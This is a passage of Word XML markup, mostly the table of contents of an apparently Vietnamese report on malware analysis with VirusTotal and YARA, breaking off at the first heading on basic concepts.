            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718128 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00AD5DE1" w14:textId="58BE0ACC"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29" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Phương pháp phát hiện</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718129 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15F73E8F" w14:textId="26FD174B"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30" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Tổng quan về engines</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718130 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4927A1CE" w14:textId="02E40F22"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31" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. S</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>craping data</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718131 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10774779" w14:textId="1C03BC4A" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718132" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">V. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các bước sử dụng VirusTotal để phân tích mã độc</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718132 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AFDB0D7" w14:textId="4BE48E1B"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33" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Quét chữ ký</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718133 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="017617AE" w14:textId="1758E80F"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34" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Phân tích hành vi (Behavior)</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718134 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A770D15" w14:textId="335A4421" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718135" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>VI. So sánh VirusTotal và YARA.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718135 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="343DB22D" w14:textId="20D8B424"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36" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718136 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DE93BA2" w14:textId="33AB3666"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37" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. YARA.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718137 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37A1786D" w14:textId="7F9FFCB5" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718138" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Tích hợp công cụ YARA vào VirusTotal.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718138 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78236402" w14:textId="37AE98B3" w:rsidR="00947F5D" w:rsidRDefault="00947F5D">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="43343DEB" w14:textId="77777777" w:rsidR="00947F5D" w:rsidRPr="00947F5D" w:rsidRDefault="00947F5D" w:rsidP="00947F5D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C86638A" w14:textId="77777777" w:rsidR="009A17C6" w:rsidRPr="009A17C6" w:rsidRDefault="009A17C6" w:rsidP="009A17C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50285407" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BFD7D1" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331723A5" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596E3A4B" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FC1B9B" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2AD644" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4018141E" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233D4D13" w14:textId="77777777" w:rsidR="00EE0876" w:rsidRDefault="00EE0876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC87D4C" w14:textId="77777777" w:rsidR="00EE0876" w:rsidRDefault="00EE0876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3331A045" w14:textId="5E6735A9" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc150717765"/>
      <w:bookmarkStart w:id="1" w:name="_Toc150718027"/>
      <w:bookmarkStart w:id="2" w:name="_Toc150718114"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I.Các khái niệm cơ bản</w:t>
      </w:r>
      <w:r w:rsidR="00EE0876" w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="11DE539B" w14:textId="38828AC8" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc150717766"/>
      <w:bookmarkStart w:id="4" w:name="_Toc150718028"/>
      <w:bookmarkStart w:id="5" w:name="_Toc150718115"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
